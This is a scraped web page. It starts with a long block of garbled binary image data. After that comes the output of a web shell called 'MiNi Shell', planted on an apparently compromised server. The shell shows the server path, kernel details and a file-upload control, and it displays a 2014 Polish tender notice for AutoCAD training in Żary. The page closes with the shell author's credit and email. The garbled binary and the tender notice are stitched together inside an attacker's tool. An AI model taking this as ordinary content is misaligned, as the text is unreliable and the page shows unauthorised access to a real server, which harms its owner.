JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140926/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140926/204821-N-2014.html

<p class="kh_header"><b>Żary: USŁUGI SZKOLENIA KOMPUTEROWEGO DLA OSÓB PRACUJĄCYCH Z BRANŻY BUDOWLANEJ I ARCHITEKTÓW - AUTOCAD</b><br>
<b>Numer ogłoszenia: 204821 - 2014; data zamieszczenia: 26.09.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Fundacja"Przedsiębiorczość" , ul. Mieszka I nr 13, 68-200 Żary, woj. lubuskie, tel. 68 479 16 00, faks 68 479 16 04.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.bslp.consultor.pl/</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Organizacja pozarządowa - FUNDACJA..</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> USŁUGI SZKOLENIA KOMPUTEROWEGO DLA OSÓB PRACUJĄCYCH Z BRANŻY BUDOWLANEJ I ARCHITEKTÓW - AUTOCAD.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem postępowania są: USŁUGI SZKOLENIA KOMPUTEROWEGO DLA OSÓB PRACUJĄCYCH Z BRANŻY BUDOWLANEJ I ARCHITEKTÓW - AUTOCAD 2. Kod zamówienia: 80533100-0 - Usługi szkolenia komputerowego (na podstawie Wspólnego Słownika Zamówień CPV). 3. Zamawiający skieruje na szkolenie ogółem 60 osób dorosłych (4 grupy po 15 osób), pracujących w branży budowlanej i architektów, legitymujących się wykształceniem co najwyżej średnim. 4. Program szkolenia musi obejmować 48 godzin  dla każdej z grup. 5. Celem szkolenia jest przygotowanie każdego z uczestników szkolenia w zakresie: - komputerowego wspomagania projektowania - 8h - umiejętności rysowania obiektów w wersji płaskiej (2D) i przestrzennej (3D)- 16h - samodzielne opracowywania części rysunkowej projektów technicznych - 16h - narzędzia do kreślenia i projektowania - 6h - egzamin zewnętrzny zapewniający uzyskanie certyfikatu AUTODESK - 2h Ze względu na fakt, że poziom szkolenia jest zależny od wyników Analizy potrzeb szkoleniowych, cena została uśredniona, tak by wykonawca mógł zapewnić szkolenie na każdym poziomie względem potrzeb uczestników. 6. Zajęcia muszą odbywać się w weekendy (sobota-niedziela), maksymalnie 8 godzin dziennie. 7. Szkolenie ma się odbywać na terenie woj. lubuskiego. 8. Szkolenie kończy się egzaminem końcowym oraz wydaniem zaświadczeń zgodnie w § 18 ust. 2 rozporządzenia Ministra Edukacji i Nauki z dnia 11 stycznia 2012 r. w sprawie kształcenia ustawicznego w formach pozaszkolnych (Dz. U. z 2012 r., poz. 186). Dodatkowo należy załączyć suplement zawierający: - informacje o okresie trwania szkolenia, - tematy i wymiar godzinowy zajęć edukacyjnych, - numer z rejestru zaświadczenia, do którego suplement jest dodatkiem, - podpis osoby upoważnionej przez instytucję szkoleniową prowadzącą szkolenie. 9. Zamawiający wymaga aby Wykonawca zapewnił w trakcie szkolenia: a) warunki zgodne z ogólnymi przepisami bezpieczeństwa i higieny pracy, z zachowaniem przepisów dotyczących ochrony środowiska, b) odpowiednie warunki lokalowe do prowadzenia zajęć: salę wykładową przewidzianą do prowadzenia zajęć dla grupy minimum 15 osób, z odpowiednim oświetleniem, ogrzewaniem, wentylacją, wyposażoną w sprzęt audiowizualny, w tym w projektor multimedialny, tablicę oraz inne niezbędne pomoce dydaktyczne, a także gwarantującą odrębne miejsce siedzące - krzesło i odrębny stolik dla każdego uczestnika szkolenia oraz odrębne pomieszczenie, wyposażone w stoliki oraz miejsca siedzące, do spożywania poczęstunku i ciepłych oraz zimnych napojów (zaplecze socjalne) - oba pomieszczenia bez dostępu dla osób trzecich przez cały czas trwania szkolenia. Dodatkowo należy zapewnić uczestnikom szkolenia swobodny dostęp do pomieszczeń sanitarnych (WC, umywalka z dostępem do ciepłej wody), wyposażonych w niezbędne środki czystości (papier toaletowy, mydło, ręczniki papierowe lub suszarki do rąk), c) osobne stanowisko komputerowe dla każdego uczestnika szkolenia, tj. 15 w pełni sprawnych i zawierających niezbędne autoryzowane oprogramowanie komputerów, d) nieodpłatne materiały szkoleniowe, (podręczniki, skrypty) przekazane każdemu z uczestników szkolenia na własność. Ponadto wymagane jest, aby każdy uczestnik kursu otrzymał wszystkie materiały oraz prezentacje użyte na szkoleniu. Należy także uwzględnić po 1 egzemplarzu materiałów szkoleniowych, zawierających identyczną jak dla uczestników treść, dla Zamawiającego. Wszystkie materiały uczestnicy powinni otrzymać w pierwszym dniu szkolenia. Materiały dla Zamawiającego należy dostarczyć najpóźniej w ostatnim dniu szkolenia, 10. Zamawiający wymaga aby Wykonawca: przekazał Zamawiającemu minimum 3 dni przed rozpoczęciem szkolenia harmonogram planowanych do realizacji zajęć, pisemnie informował Zamawiającego o wszelkich planowanych zmianach w harmonogramie zajęć przed ich dokonaniem, również w przypadku odwołania zajęć z przyczyn niezależnych od wykonawcy, z uwzględnieniem propozycji zmiany w harmonogramie, wynikających z odwołania zajęć; zapewnił odpowiednią dokumentacje składająca się z: dziennika zajęć edukacyjnych, zawierającego tematy i wymiar godzin zajęć, listę obecności, zawierającą imiona i nazwiska uczestników wraz z podpisami w każdym dniu szkolenia - listę obecności należy przekazać Zamawiającemu do 2 dnia roboczego każdego miesiąca za miesiąc poprzedni, imienne listy na której uczestnicy szkolenia potwierdzą otrzymanie materiałów szkoleniowych, protokół i karty oceny z okresowych sprawdzianów efektów kształcenia oraz egzaminu końcowego, niezwłocznie pisemnie informował zamawiającego o niezgłaszaniu się uczestników, przerwaniu szkolenia lub rezygnacji uczestnika, innych sytuacjach które mogą mieć wpływ na realizację programu szkolenia i umowy. W terminie do 5 dni od dnia zakończenia szkolenia należy dostarczyć Wykonawcy następujące dokumenty: dziennik zajęć, imienna listę obecności uczestników szkolenia, 2 kserokopie zaświadczeń o ukończeniu szkolenia lub inny stosowny dokument potwierdzony za zgodność z oryginałem. Wraz z ofertą dostarczyć wzór zaświadczenia jakie otrzyma uczestnik po zakończeniu szkolenia. 11. Wszystkie zajęcia powinny być przeprowadzone przez wykładowców. Zamawiający nie dopuszcza możliwości prowadzenia zajęć w formie eksternistycznej, metodą e-learningu, drogą elektroniczną itp. Zamawiający wymaga aby Wykonawca zapewnił do prowadzenia szkolenia co najmniej 1 wykładowcę - zgodnie z zasadami opisanymi w Rozdziale V i XIII SIWZ. W uzasadnionych przypadkach w trakcie szkolenia lub przed jego rozpoczęciem, Wykonawca może się zwrócić o zmianę wykładowcy - na innego niż wskazanego w ofercie, pod warunkiem, że: - wykładowca, który zastąpi dotychczasowego spełnia wszystkie wymogi określone w SIWZ, - Wykonawca o dokonanie zmiany zwróci się z pisemnym wnioskiem, podając uzasadnioną przyczynę takiej sytuacji, - Wykonawca uzyska pisemną zgodę Zamawiającego przed dokonaniem takiej zmiany. 12. Na wszelkiego rodzaju dokumentach związanych z realizacją szkolenia: zaświadczeniach, materiałach szkoleniowych, programie szkolenia, ankietach ewaluacyjnych oraz innych, Wykonawca jest zobowiązany zamieścić informację o współfinansowaniu szkolenia przez Unię Europejską ze środków Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki, oraz zamieścić oznaczenia zgodnie z zasadą wizualizacji obowiązującą w Planie Komunikacji PO KL oraz załącznikiem: Wytyczne dotyczące oznaczania projektów w ramach Programu Operacyjnego Kapitał Ludzki dostępnymi na stronie: www.efs.gov.pl w zakładce: zasady promocji - logo. Podobne zasady dotyczą oznaczenia miejsca odbywania szkolenia..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.53.31.00-0.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 28.06.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi posiadać uprawnienia do wykonania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień. Spełnienie warunku będzie weryfikowane poprzez dołączenie do oferty aktualnego (nie starszego niż 3 miesiące od daty złożenia oferty) dokumentu rejestrowego lub kopii potwierdzonej za zgodność z oryginałem.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać, że w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał należycie co najmniej 2 usługi polegające na przeprowadzeniu szkoleń z zakresu tożsamego z przedmiotem zamówienia określonym w niniejszej SIWZ, tj. kurs AutoCAD, dla grup liczących minimum 15 osób.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać dysponowanie (dysponuje lub będzie dysponował) osobami zdolnymi do wykonania zamówienia, tj. przynajmniej 1 osobą posiadającą doświadczenie w realizacji minimum 3 kursów AutoCAD.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 45</li>
<li>2 - Wiedza i doświadczenie wykonawcy - 20</li>
<li>3 - Kadra - 10</li>
<li>4 - Sprzęt i materiały - 15</li>
<li>5 - Posiadane certyfikaty - 10</li>
</ul>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.bslp.consultor.pl/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Fundacja Przedsiębiorczość ul. Mieszka I 13, 68-200 Żary..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 07.10.2014 godzina 09:00, miejsce: Fundacja Przedsiębiorczość ul. Mieszka I 13, 68-200 Żary, II piętro pok. 14..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Szkolenie w ramach projektu pt. Budujemy siłę lubuskich przedsiębiorstw!, Priorytet VIII Regionalne kadry gospodarki, Działanie 8.1. Rozwój pracowników i przedsiębiorstw w regionie, Poddziałanie 8.1.1. Wspieranie rozwoju kwalifikacji zawodowych i doradztwo dla przedsiębiorstw, Programu Operacyjnego Kapitał Ludzki, współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com